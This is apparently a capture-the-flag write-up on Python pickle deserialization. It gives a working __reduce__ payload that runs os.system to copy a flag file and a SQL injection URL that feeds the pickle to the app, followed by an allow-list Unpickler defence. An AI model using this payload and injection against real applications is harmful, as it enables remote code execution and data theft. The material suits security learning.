C.O.P

Exploiting Python pickles

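In Python, the pickle module lets you serialize and deserialize data: you can convert a Python object into a stream of bytes and later reconstruct it (including the object’s internal structure) in a different process or environment by loading that stream of bytes. An object can define __reduce__ to tell pickle which callable to invoke, and with which arguments, when it is reconstructed, so loading a pickle from an untrusted source runs whatever call the stream names.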

# picke_test.py
import pickle
import base64
import os


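class RCE:
    # pickle calls __reduce__ when dumping; on load it invokes the returned
    # callable with the returned argument tuple.
    def __reduce__(self):
        cmd = 'cp flag.txt ./application/static/flag.txt'
        return os.system, (cmd,)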


if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))

http://<sitename>/view/1' union select '<Malicious Pickle>

http://<Site Name>/static/flag.txt
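
A defensive counterpart to the __reduce__ payload above, added here as an example and not part of the original write-up: it lists the globals a pickle would import without loading it, then loads through an allow-list Unpickler. `ALLOWED_GLOBALS`, `referenced_globals`, `safe_loads` and `Sample` are names assumed for illustration; `Sample` is a constructed, harmless input whose `__reduce__` names `print`.

```python
import io
import pickle
import pickletools

# Assumed allow-list: the only globals this hypothetical app needs to rebuild.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


def referenced_globals(data):
    """List (module, name) pairs a pickle would import, without loading it."""
    found, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if isinstance(arg, str):
            strings.append(arg)
        if opcode.name == "GLOBAL":          # protocols 0-3: arg is "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif opcode.name == "STACK_GLOBAL":  # protocol 4+: names pushed as strings
            # Heuristic: assumes the two most recent string pushes are the names.
            found.append(tuple(strings[-2:]))
    return found


class AllowListUnpickler(pickle.Unpickler):
    # find_class is called for every global the stream asks for.
    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)


def safe_loads(data):
    """Load a pickle, rejecting any global that is not allow-listed."""
    return AllowListUnpickler(io.BytesIO(data)).load()


class Sample:
    """Constructed, harmless stand-in: __reduce__ names print, not a shell call."""

    def __reduce__(self):
        return print, ("constructed sample",)


SAMPLE = pickle.dumps(Sample(), protocol=4)  # constructed test input

if __name__ == "__main__":
    print(referenced_globals(SAMPLE))  # static view, nothing is executed
    try:
        safe_loads(SAMPLE)
    except pickle.UnpicklingError as exc:
        print("rejected:", exc)
```

The static scan is a triage heuristic; the `find_class` override is what enforces the policy. Data that crosses a trust boundary is better carried in a format such as JSON.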